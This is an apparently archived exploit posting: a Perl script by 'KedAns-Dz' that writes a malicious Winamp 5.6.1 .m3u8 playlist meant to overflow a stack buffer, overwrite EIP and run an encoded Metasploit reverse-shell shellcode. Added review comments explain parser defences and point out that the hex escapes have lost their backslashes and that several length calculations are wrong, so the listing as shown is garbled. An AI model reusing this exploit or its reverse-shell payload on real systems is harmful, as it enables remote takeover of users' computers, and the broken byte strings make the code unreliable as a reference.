
Winamp 5.6.1 .m3u8 Buffer Overflow

Posted on 12 April 2011

#!/usr/bin/perl
###
# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Stack Overflow
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
#
# NOTE(review): this script does not touch a running Winamp; it only writes
# one playlist file (KedAns.m3u8, see the open() near the end) whose body is
# a "#EXTM3U" header followed by a very long run of a single repeated byte.
# Per the title above, the intent is that the player's .m3u8 parser copies
# an entry of that size into a fixed-size stack buffer. The defensive
# lessons are the usual ones: a parser handling playlist files from
# untrusted sources must bound entry length before copying, and a .m3u8
# that starts with "#EXTM3U" and continues with tens of kilobytes of one
# repeated byte is a content anomaly worth flagging.
#
# NOTE(review): in this rendering the hex escapes have lost their
# backslashes ("x41" rather than "\x41"), so every quoted string below is
# plain ASCII text. The byte counts and register values described in the
# original comments therefore do not hold for the listing as shown.
#
# NOTE(review): no `use strict;` / `use warnings;` — several of the defects
# noted below would have been reported at run time with them enabled.
my $header = "#EXTM3U ";
my $junk = "x41" x 16240; # Buffer Junk (filler region that follows the header)
my $eip = "xadx86x0ex07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
# Sequence of 4-byte little-endian values interleaved with filler; the
# original author's comments name the register each value is intended for.
my $seh = pack('V',0x10017928); # add ESP,4404
$seh = $seh.pack('V',0x00000003); # value for EAX
$seh = $seh."x41" x 11;
$seh = $seh.pack('V',0x41414141); # value for ECX
$seh = $seh."x41" x 3;
$seh = $seh.pack('V',0x007EA478); # value for EDX
$seh = $seh."x41" x 22;
$seh = $seh.pack('V',0x40000001); # value for EBX
$seh = $seh."x41" x 8;
$seh = $seh.pack('V',0x028F1DB0); # value for ESP
$seh = $seh."x41" x 12;
$seh = $seh.pack('V',0x77230459); # value for EBP
$seh = $seh."x41" x 10;
$seh = $seh.pack('V',0x08FD62A8); # value for ESI
$seh = $seh."x41" x 11;
$seh = $seh.pack('V',0x00497300); # value for EDI
$seh = $seh."x41" x 2;
$seh = $seh.pack('V',0x08FD293C); # value for EIP
$seh = $seh."x41" x 5;
my $nops = "x90" x 100; # Nop
# NOTE(review): with the escapes lost, length($junk) already exceeds 43492,
# so the repeat count is negative and $space is the empty string.
my $space = "x41" x (43492 - length($junk) - length($nops));
my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" .
"x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" .
"x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" .
"x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" .
"x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" .
"x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" .
"x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" .
"x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" .
"x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" .
"x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" .
"x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" .
"x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" .
"x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" .
"x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" .
"x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" .
"x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" .
"x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" .
"x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" .
"x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" .
"x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" .
"x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" .
"x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" .
"x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" .
"x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" .
"x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" .
"x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" .
"x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" .
"x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" .
"x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" .
"x50x43x30x47x71x43x58x43x32x45x50x44x51x43" .
"x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" .
"x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" .
"x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" .
"x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" .
"x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" .
"x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" .
"x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" .
"x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" .
"x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" .
"x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" .
"x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" .
"x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" .
"x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" .
"x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" .
"x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" .
"x7ax47x70x46x33x4bx4fx49x45x41x41";
# NOTE(review): $nops is a string, not its length; in numeric context it
# evaluates to 0 (with a warning, were warnings enabled), so the repeat
# count is simply 20000 rather than the difference the line appears to intend.
my $end = "x90" x (20000 - $nops); # Nop sled
# NOTE(review): bareword filehandle, two-argument open in append mode (">>"),
# and no error check on open, print or close. Because of the append mode,
# each run adds another copy of the payload to an existing KedAns.m3u8
# instead of replacing it.
open(FILE,'>>KedAns.m3u8');
print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close(FILE);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)
# Nayla Festa * all (sec4ever.com) Members * KelvinX (kelvinx.net) * PLATEN (Pentesters.ir)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-db.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================

 
